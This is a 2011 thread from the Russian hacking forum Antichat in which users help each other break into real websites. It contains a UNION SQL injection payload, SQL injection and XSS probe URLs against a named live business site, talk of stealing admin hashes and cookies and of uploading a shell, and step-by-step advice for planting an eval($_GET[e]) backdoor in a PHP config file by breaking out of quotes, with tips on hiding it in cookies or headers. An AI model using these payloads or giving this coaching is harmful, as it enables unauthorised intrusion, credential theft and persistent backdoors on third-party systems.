ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.07.2011, 03:51
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
Сообщение от beBoss
beBoss said:
But after hours of trying I found a vuln (not sure), but I think is vuln.
PM me link - i will try to help you
|
|
|
20.07.2011, 05:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
8271
Репутация:
0
|
|
Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.
edit: I have a question: how to use "update" in sql and is it possible ?
This is sql injection with select:
Код:
Code:
+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12 from information_schema.schemata--+-
how to update any table? |
|
|
|
20.07.2011, 12:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от beBoss
beBoss said:
Hey I succeeded. Thanks for your time, and sorry again for that i'm writing in english.
edit: I have a question: how to use "update" in sql and is it possible ?
This is sql injection with select:
Код:
Code:
+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12 from information_schema.schemata--+-
how to update any table? it's impossible
Сообщение от alexvrn
alexvrn said:
Если тут уязвимости
Код:
Code:
http://www.qatcom.com/yellowpages/view/-66854%27
http://www.qatcom.com/listings/search?searchtype=both&what=%3Cscript%3Ealert%28+%27hi!%27%29%3C%2Fscript%3E
http://www.qatcom.com/listings/googlesearch?gwhat=%3Cscript%3Ealert%28+%27hi!%27%29%3C%2Fscript%3E
Кто хочет помочь с сайтом за $ пишите в личку http://www.qatcom.com/yellowpages/view/-66854%27 - нету скули
|
|
|
|
20.07.2011, 12:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
8271
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
it's impossible
So in my case, I can only read info... Well I can get admins hash passwords, but I can't login with them. Only can login with member and vip acc, but they are simple acc. There is something in mods and admins acc, may be cookie or something that I don;t have and when change my cookies with admin cookies it's logout me.... What can I do ? Is there chance to upload shell or to know what is different with acc, or any way to change someting ? :S
|
|
|
|
20.07.2011, 15:37
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
Провел на форуме:
11373
Репутация:
0
|
|
к index.php подключается include('includes/header.php');
строки из header.php
PHP код:
PHP:
[COLOR="#000000"][/COLOR]" />
[/COLOR]" />[/COLOR]
значения $hc_cfg6 и $hc_cfg5; берутся из таблицы в файле config.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$hc_cfg5[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"12345"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$hc_cfg6[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"123"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
через админку в файл config.phpудается прописать eval($_GET[e]);
результат
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
но ?e=phpinfo(); выводит пустую страницу.
(если прописать system($_GET['e']); весь сайт накрывается ошибкой
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9
если прописать то в index.php выглядит так
PHP код:
PHP:
[COLOR="#000000"][/COLOR]" />[/COLOR]
Подскажите пожалуйста где я ошибся? Или что делаю не так? |
|
|
|
20.07.2011, 16:04
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Sloneny
Sloneny said:
к index.php подключается
include('includes/header.php');
строки из
header.php
PHP код:
PHP:
[COLOR="#000000"][/COLOR]" />
[/COLOR]" />[/COLOR]
значения
$hc_cfg6
и
$hc_cfg5;
берутся из таблицы в файле
config.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$hc_cfg5[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"12345"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$hc_cfg6[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"123"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
через админку в файл
config.php
удается прописать
eval($_GET[e]);
результат
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
но
?e=phpinfo();
выводит пустую страницу.
(если прописать system($_GET['e']); весь сайт накрывается ошибкой
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/******/public_html/******/******/config.php on line 9
если прописать то в index.php выглядит так
PHP код:
PHP:
[COLOR="#000000"][/COLOR]" />[/COLOR]
Подскажите пожалуйста где я ошибся? Или что делаю не так? ты сначало убедись что пхп работает как надо, пропеши команду
Сообщение от None
echo "123";
если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:
Сообщение от None
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
и вызываешь еко так "?e=phpinfo();"
|
|
|
|
20.07.2011, 16:10
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Sloneny
Тебе нужно выйти за кавычки, иначе получается, что переменная $hc_cfg6 имеет тип string и содержит строку eval($_GET[e]); соответственно код выполняться не будет
Вписываешь что то вроде
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]";eval([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]);"
[/COLOR][/COLOR]
в итоге получаешь выполнение кода
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$hc_cfg6[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];eval([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]]);[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
?e=phpinfo(); выведет phpinfo
|
|
|
|
20.07.2011, 16:21
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
ты сначало убедись что пхп работает как надо, пропеши команду
если там где вставил , будет вывод 123, значит робит норм, встовляй тогда где тебе нужно вот этот код:
и вызываешь еко так "?e=phpinfo();"
Если админка фильтрует кавычки, то ты ничто не сделаешь, это банальная XSS. Если же нет, нужно просто выйти за переменную и вставить выполняемый код, как показал h00lyshit!(Если фильтруется двоеточие, то можно вставить код в саму переменную - ".код.").
Но при этом лучше использовать не GET и POST, а куки или HTTP заголовки. Так же возможно, что на стороне сервера запрещено выполнение этих функций.
При этом можно использовать что то типа $a($b) или вставлять нужный код напрямую.
|
|
|
|
20.07.2011, 17:08
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
Провел на форуме:
11373
Репутация:
0
|
|
echo "123"; просто в исходном становится
больше нигде не выводит
" превращает в '
$hc_cfg6 = "echo '123';";
$hc_cfg6 = " ';eval($_GET[e]);' ";
видимо придется искать другие пути
|
|
|
|
20.07.2011, 17:28
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Sloneny
Sloneny said:
echo "123"; просто в исходном становится
больше нигде не выводит
" превращает в '
$hc_cfg6 = "echo '123';";
$hc_cfg6 = " ';eval($_GET[e]);' ";
считай, что ты можешь вывести значение любой переменной, от этого и пляши. Только вот переменные выводи так:
а не
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
